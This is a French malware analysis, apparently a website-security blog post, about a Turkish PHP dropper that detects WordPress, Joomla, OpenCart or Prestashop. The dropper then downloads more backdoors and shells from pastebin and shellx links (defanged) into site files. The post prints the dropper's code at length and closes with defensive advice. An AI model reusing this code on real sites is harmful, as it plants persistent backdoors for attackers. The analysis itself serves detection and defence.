Une grande partie des logiciels malveillants que nous trouvons sur les sites Web compromis sont des portes dérobées qui permettent à un attaquant de conserver un accès non autorisé au site Web et d’exécuter les commandes souhaitées.

Un autre scénario courant est le malware injecté directement dans les fichiers d’un site Web et utilisé pour rediriger le trafic, voler des cartes de crédit et d’autres informations sensibles, détourner des ressources pour extraire des crypto-monnaies ou même diffuser des publicités indésirables.

Dans ce cas, l’attaquant a téléchargé ce que nous pensons être un compte-gouttes turc malveillant. Les commentaires de code contiennent la langue turque qui, une fois traduite, indique l’intention d’injecter des logiciels malveillants supplémentaires sur le site Web.

Un aspect intéressant de cet exemple est que le code recherche différentes versions de CMS (WordPress, Joomla, Opencart, Prestashop) et déploie le malware en fonction de l’environnement actuel.

@chmod($_SERVER['DOCUMENT_ROOT'] . "/wp-load.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/index.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/index.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/.htaccess", 0644);
function http_get($url){
        $im = curl_init($url);
        curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($im, CURLOPT_HEADER, 0);
        return curl_exec($im);
        curl_close($im);
}
$hector77734 = $_SERVER['DOCUMENT_ROOT'] . "/indeeex.php" ; /**/
$hectortxt77734 = http_get('https://pastebin[.]com/raw/t4PchdWx');
@$open77734 = fopen($hector77734, 'w');
@fwrite($open77734, $hectortxt77734);
@fclose($open77734);

Par défaut, le code tente de modifier les autorisations sur certains fichiers avant d’utiliser la requête cURL http_get () pour obtenir du contenu supplémentaire à partir de liens pastebin prédéfinis. Le malware l’écrit ensuite dans indeeex.php Avec fwrite ().

Ensuite, le compte-gouttes cible différents CMS en utilisant la fonction – en commençant par Joomla Le fichier existe () pour confirmer si le fichier de base « /includes/defines.php«  existe.

Les attaquants téléchargent ensuite des fichiers supplémentaires (joomlahide.zip et joomla.zip) de Shellx[.]org::

$jooomla = $_SERVER['DOCUMENT_ROOT'] . "/includes/defines.php";
if (file_exists($jooomla)) {
$hector5 = $_SERVER['DOCUMENT_ROOT'] . "/administrator/systeam.php";
$hectortxt5 = http_get('https://pastebin[.]com/raw/sv5Bf4gv');
@$open5 = fopen($hector5, 'w');
@fwrite($open5, $hectortxt5);
@fclose($open5);

@copy('hxxp://shellx[.]org',$_SERVER['DOCUMENT_ROOT']."/administrator/help/joomlahide.zip");
@copy('hxxp://shellx[.]org/',$_SERVER['DOCUMENT_ROOT']."/administrator/help/joomla.zip");


Ces fermetures à glissière contiennent deux autres fichiers: un Porte arrière du téléchargeur de fichiers et le An0n_3xPloiTeR Bol.

L’autre CMS a utilisé la même méthode pour vérifier certains fichiers de base et pour télécharger du contenu supplémentaire à partir de Shellx[.]org

OpenCart

/*BURDAN Aşşağı OPENCART*/
$oopencart = $_SERVER['DOCUMENT_ROOT'] . "/system/config/";
if (file_exists($oopencart)) {

$hector44441 = $_SERVER['DOCUMENT_ROOT'] . "/catalog/view/heck.php" ;
$hectortxt44441 = http_get('https://pastebin[.]com/raw/sv5Bf4gv');
@$open44441 = fopen($hector44441, 'w');
@fwrite($open44441, $hectortxt44441);
@fclose($open44441);

Prestashop

/*BURDAN aşşağı petrashop*/
$pretashop = $_SERVER['DOCUMENT_ROOT'] . "/config/smarty.config.inc.php";
if(file_exists($pretashop)){
mkdir($_SERVER['DOCUMENT_ROOT'] . "/modules/petra/");
$hector4 = $_SERVER['DOCUMENT_ROOT'] . "/modules/petra/image.php" ;
$hectortxt4 = http_get('https://pastebin[.]com/raw/9jDX17nP');
$open4 = fopen($hector4, 'w');
fwrite($open4, $hectortxt4);
fclose($open4);

Ces types de compte-gouttes malveillants sont souvent difficiles à repérer car leur objectif n’est pas d’effectuer directement une porte dérobée, un shell distant ou un téléchargement de fichiers. Au lieu de cela, ils agissent comme un pont entre l’attaquant et les autres ressources malveillantes qu’il souhaite injecter sur le site Web.

L’un des meilleurs moyens de minimiser les risques et d’identifier les comportements malveillants consiste à utiliser un Système de surveillance de l’intégrité des fichiers détecter la manipulation du contenu et attirer l’attention sur celui-ci.



Source link

Recent Posts